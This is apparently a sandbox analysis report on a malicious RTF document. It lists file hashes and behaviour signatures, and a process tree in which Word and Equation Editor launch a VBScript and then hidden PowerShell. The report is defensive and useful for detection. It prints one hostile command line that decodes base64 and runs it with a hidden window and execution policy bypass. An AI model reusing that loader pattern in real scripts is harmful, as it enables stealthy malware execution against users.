Analysis
max time kernel: 122s
max time network: 126s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 31-07-2024 13:36
Static task: static1
Behavioral task: behavioral1
  Sample: weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
  Resource: win10v2004-20240730-en
General
Target: weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
Size: 77KB
MD5: 4b9305dcc211e64941a71120617c8983
SHA1: 53b7292c31055f3e50e555542ce517bd0237b1a0
SHA256: 60415ee85c74fc9666c2445a4a36db0dbab76a25de01af187cb96ee83f492100
SHA512: 7d84b0c4c8bb2217f4072032f1179de1d116ca10d7842c77740b56a0671400c5032986ba5967d5b8836bd25e818ba06487531f090a9a6d3ee7dbbd68e4370923
SSDEEP: 384:TpTZwOjBKrUqMtpOrxdc5gEp2wZTNvK3iH5kreVI9RIebbusxSMwq:TpVwOjkrUKYgkpKSHpVIP9bbusxSc
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
  Processes: EQNEDT32.EXE
  flow | pid | process
  4 | 2480 | EQNEDT32.EXE

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell with the display window hidden.
  Processes: powershell.exe, powershell.exe
  pid | process
  2724 | powershell.exe
  2264 | powershell.exe

Drops file in System32 directory (2 IoCs)
  Processes: powershell.exe, powershell.exe
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Drops file in Windows directory (1 IoC)
  Processes: WINWORD.EXE
  description | ioc | process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
  Attempts to gather information about the system language of a victim host in order to infer its geographical location.
  Processes: powershell.exe, powershell.exe, WINWORD.EXE, EQNEDT32.EXE, WScript.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: WINWORD.EXE
  pid | process
  2288 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  2724 | powershell.exe
  2264 | powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: powershell.exe, powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2724 | powershell.exe
  Token: SeDebugPrivilege | 2264 | powershell.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  2288 | WINWORD.EXE
  2288 | WINWORD.EXE

Suspicious use of WriteProcessMemory (16 IoCs)
  Processes: EQNEDT32.EXE, WScript.exe, powershell.exe, WINWORD.EXE
  description | pid | process | target process
  PID 2480 wrote to memory of 2712 | 2480 | EQNEDT32.EXE | WScript.exe (4 identical entries)
  PID 2712 wrote to memory of 2724 | 2712 | WScript.exe | powershell.exe (4 identical entries)
  PID 2724 wrote to memory of 2264 | 2724 | powershell.exe | powershell.exe (4 identical entries)
  PID 2288 wrote to memory of 272 | 2288 | WINWORD.EXE | splwow64.exe (4 identical entries)
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe (child of WINWORD.EXE)
    Command line: C:\Windows\splwow64.exe 12288

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WScript.exe (child of EQNEDT32.EXE)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBS"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of WScript.exe)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of powershell.exe)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 7cf6980e2d452b909e5dd9c55e37c04b
  SHA1: b164fd26bf2b73127b83aea72a063e85af928cb9
  SHA256: f9e5452a8f0314e798b73c877a52086bc18e652518d74ba227997370fd423b16
  SHA512: 62d5f211282cd8c8364372a4afee49b6be7f178cca8952f3c7c6ee8e29987acdabf7f94d0e698c2e830dac5cd3493a36957d015d5136fd1e62db3355f4491786

C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBS
  Filesize: 234KB
  MD5: 935dee250a117207ad585b612947fa27
  SHA1: c6ae8ce6d985d1be08adf7f14ef2ce0ffbc1cd62
  SHA256: 1d2f072eaaa8fd2f52c3dfaa1a888b614ed4ea21ecd4daff2f959d81f789a671
  SHA512: b2f7144e0748a6fd1b423ba9fa2b694011d1591c966faae54b8a89409c686938bed0550b7a9bb84bdd48ac85483204ee81fb0b2a319c748a41ceb4b5e14170e7

memory/2288-0-0x000000002F071000-0x000000002F072000-memory.dmp
  Filesize: 4KB

memory/2288-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
  Filesize: 64KB

memory/2288-2-0x000000007112D000-0x0000000071138000-memory.dmp
  Filesize: 44KB

memory/2288-23-0x000000007112D000-0x0000000071138000-memory.dmp
  Filesize: 44KB